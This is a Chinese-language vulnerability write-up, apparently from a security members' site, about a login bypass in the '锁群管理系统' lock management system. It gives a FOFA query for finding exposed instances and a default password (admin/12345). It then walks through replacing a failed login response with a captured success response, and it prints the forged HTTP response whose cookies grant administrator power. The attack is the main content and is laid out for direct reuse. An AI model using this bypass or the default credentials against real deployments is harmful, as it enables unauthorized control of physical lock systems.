锁群管理系统登录绕过漏洞-棉花糖会员站

# 锁群管理系统登录绕过漏洞

## 漏洞描述

江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。

## 漏洞影响

> 锁群管理系统

## FOFA

> title=”锁群管理系统”

## POC

1）登录界面如下

![1](/static/qingy/锁群管理系统登录绕过漏洞/img/1.jpg)

2）锁群存在弱口令admin/12345，先用正确的弱口令登录抓包。多次尝试后然后发现登录成功的的返回包都不变。

![2](/static/qingy/锁群管理系统登录绕过漏洞/img/2.jpg)

3）利用思路：

这里注意到登录成功的返回包里似乎都是固定值，并没有随机的cookie产生，所以直接尝试把这个正确的返回包去替换其他网站的登陆包：

先随便用admin/admin账号登录显示密码错误：

![3](/static/qingy/锁群管理系统登录绕过漏洞/img/3.jpg)

4）修改返回包Forward，一个一个放

![4](/static/qingy/锁群管理系统登录绕过漏洞/img/4.jpg)

5）出现这个界面后把所有数据替换返回成功的数据包

![5](/static/qingy/锁群管理系统登录绕过漏洞/img/5.jpg)

“`
HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

Set-Cookie: username=admin; path=/

Set-Cookie: code=admin; path=/

Set-Cookie: power=1; path=/

Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/

X-Powered-By: ASP.NET

Date: Sat, 05 Jun 2021 01:36:06 GMT

Connection: close

Content-Length: 1

0
“`

![6](/static/qingy/锁群管理系统登录绕过漏洞/img/6.jpg)

7）数据全放后成功登录后台

![7](/static/qingy/锁群管理系统登录绕过漏洞/img/7.jpg)

文章版权归作者所有，未经允许请勿转载。

THE END

锁群管理系统登录绕过漏洞